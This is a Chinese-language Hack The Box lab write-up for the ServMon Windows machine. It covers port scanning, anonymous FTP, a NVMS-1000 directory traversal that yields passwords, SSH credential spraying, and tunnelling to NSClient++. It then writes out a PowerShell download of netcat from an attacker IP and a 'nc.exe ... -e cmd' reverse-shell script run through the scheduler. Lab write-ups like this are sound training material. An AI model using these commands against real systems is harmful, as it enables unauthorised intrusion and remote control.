HTB 学习笔记

【Hack The Box】windows练习-- ServMon

🔥系列专栏：Hack The Box
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间：🌴2022年9月7日🌴
🍭作者水平很有限，如果发现错误，还望告知，感谢！

信息收集

21/tcp   open  ftp           Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_02-27-22  10:08PM       <DIR>          Users
| ftp-syst: 
|_  SYST: Windows_NT
22/tcp   open  ssh           OpenSSH for_Windows_8.0 (protocol 2.0)
80/tcp   open  http
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
5666/tcp open  tcpwrapped
6699/tcp open  napster?
8443/tcp open  ssl/https-alt
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2020-01-14T13:24:20
|_Not valid after:  2021-01-13T13:24:20
|_ssl-date: TLS randomness does not represent time
| fingerprint-strings: 
|   FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions: 
|     HTTP/1.1 404
|     Content-Length: 18
|     Document not found
|   GetRequest: 
|     HTTP/1.1 302
|     Content-Length: 0
|     Location: /index.html
|     workers
|_    jobs
| http-title: NSClient++

把这几个先枚举了，发现啥也干不了
就看ftp因为可以匿名登陆
所以进去看看有没有信息
首先就是两个用户名，然后还有一个密码文件得去找找，但是ftp里刚才也没看到啊

尝试了一下目录遍历，但是啥都没搞出来
于是去谷歌搜了一下这个NVMS-1000
然后搜到了一个目录遍历

目录遍历

整了这么多个密码，做个密码本，用户名本就用那两个人就行

1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$

登陆

crackmapexec ssh 10.129.227.75 -u user.txt -p pass.txt

账号密码如下

nadine / L1k3B1gBut7s@W0rk

登陆之后，先进行内核之类的枚举
然后在这里发现了一个可以的服务，program fils也是必须查看的目录
而且我们在之前看到的那个note中，也能看到相关信息

进去以后，看到了一个ini文件
ini就相当于linux中的config文件，我是这么认为的

然后就发现了一个密码，并且在下面还能看到是只允许本地登陆
是8443

ssh隧道搭建

ssh nadine@10.10.10.184 -L 8443:127.0.0.1:8443

 iwr http://10.10.14.52:8000/nc64.exe -Outfile C:\Temp\nc.exe 
 bat脚本编写是这样的
 \Temp\nc.exe 10.10.14.13 8888 -e cmd

登陆本地8443，按图配置，value树枝都会上传脚本以及nc，来反弹端口

我们现在将通过在调度程序中添加一个新部分来重复该过程，路径如下 /settings/scheduler 。 现在将 shell 的键和值设置为 interval = 1m 并添加更改。